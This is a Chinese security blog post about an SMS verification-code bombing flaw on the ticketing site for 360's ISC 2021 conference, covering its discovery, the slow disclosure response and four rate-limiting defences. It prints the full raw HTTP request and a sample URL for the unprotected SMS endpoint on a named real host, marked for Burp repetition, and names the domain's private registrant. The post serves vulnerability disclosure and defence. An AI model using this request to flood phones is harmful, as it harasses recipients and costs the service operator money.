手机遭受360ISC 短信验证码轰炸的思考? – 作者:eisoo021

事件背景:

平时大家在一些验证和网银支付时候收到“验证码”,比如我们更换了手机,重新登陆支付宝App时,为了保障账户安全,支付宝平台会要求进行输入短信验证码是很平常的事情。

然而,凌晨,手机在几分钟几百条的“验证码”攻击,被吵醒,你还能忍受吗!  是不是想要打人了。

这不是故事,这是发生在朋友身上的事情。

李某,程序员,凌晨收到上百条来自ISC的短信验证码,一时很惊讶,自己不熟悉什么isc会议,也不会参加,这才反应过来,这是被人恶意骚扰了。而且第二天又收到了好几次短信轰炸。搞得人莫名的烦躁。

图片[1]-手机遭受360ISC 短信验证码轰炸的思考? – 作者:eisoo021-安全小百科

调查分析:

在360官网发现了isc的广告链接,2021年7.27-29日举办会议。

图片[2]-手机遭受360ISC 短信验证码轰炸的思考? – 作者:eisoo021-安全小百科

我们就进一步确认,看那些地方可以发出此类恶心的短信验证码。

https://isc.360.com/2021/events/isc.html的购票平台,点击购票,然后发现

图片[3]-手机遭受360ISC 短信验证码轰炸的思考? – 作者:eisoo021-安全小百科

点“立即购票”,跳转到

http://isc2021.haoshuzx.com/buy.html短信验证码平台 没有采取任何的安全校验和策略,存在短信验证码轰炸漏洞,恶意利用。漏洞确实存在。

测试一波,疗效与攻击者的轰炸效果相同,手机上收到了验证码。

图片[4]-手机遭受360ISC 短信验证码轰炸的思考? – 作者:eisoo021-安全小百科原因是这里没有任何的校验,可以任意无限制发验证码。

GET /api/sms/sendVerifyCode?callback=jQuery33105721673681861341_1625023654504&uid=b86def726cb0238bdad11c739b05fc63&channel=&phone=§188010478478§&_=1625023654506 HTTP/1.1
Host: isc2021.haoshuzx.com
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (JB360; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/json;charset=utf-8
Referer: http://isc2021.haoshuzx.com/buy.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_4f239080fc28be084d90b03a76f2c64c=2625023639; loginUid=cao86def726cb0238bdad11c739b05fc63; orderInfos=%7B%22items%22%3A%5B%7B%22ticketId%22%3A%221%22%2C%22name%22%3A%22VVIP%E8%B4%B5%E5%AE%BE%E7%A5%A8%22%2C%22num%22%3A%221%22%2C%22type%22%3A%221%22%2C%22amt%22%3A%224740.00%22%7D%5D%2C%22orderAmt%22%3A%224740.00%22%7D; Hm_lpvt_4f235080fc28be084d90b03a76f2c64c=16250236678
Connection: close

eg:   https://isc2021.haoshuzx.com/api/sms/sendVerifyCode?callback=jQuery33105721673681861341_1625023654504&uid=b86def726cb0238bdad11c739b05fc63&channel=&phone=18802108888&_=1625023654506   

二话不说,上burp:

图片[5]-手机遭受360ISC 短信验证码轰炸的思考? – 作者:eisoo021-安全小百科可以任意无限制的对任何号段群发验证码。

第一时间反馈给360多个安全团队,360的安全应急响应团队,两周多了均无任何响应。

朋友还是会偶尔被短信验证码轰炸,不得已,反馈给360的客服团队,两小时后得到反馈。

图片[6]-手机遭受360ISC 短信验证码轰炸的思考? – 作者:eisoo021-安全小百科还是360客服比较有效率,又过了一个周,程序员基本敷衍性质的修复,能够勉强起到一点作用。

从此,安静了一些。

细心的朋友一定会发现,购票页面的url不是360.com结尾,http://isc2021.haoshuzx.com/ 这个域名信息是一个 “个人”,备案信息也是“个人”。 姓名为 “杨东先”。网站名称:好书网。

图片[7]-手机遭受360ISC 短信验证码轰炸的思考? – 作者:eisoo021-安全小百科

开始还以为是被钓鱼,后来确认确实是360的在用。

遇到短信验证码被恶意轰炸利用怎么解决?

发送短信接口是最容易被盗刷的接口,不法分子利用接口的漏洞,任意的发送短信,给企业造成直接的经济损失。因此这个要特别注意,主要防御手段有四:

(一)同一个手机号限制每日发送短信条数;

(二)限制发送短信间隔,通常限制是 60秒,在客户端设置60秒倒计时没什么用,在服务端也要做;

(三)给接口加签名验证增加破解接口的难度。

(四)限制ip日发送短信条数

来源:freebuf.com 2021-07-21 10:19:00 by: eisoo021

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论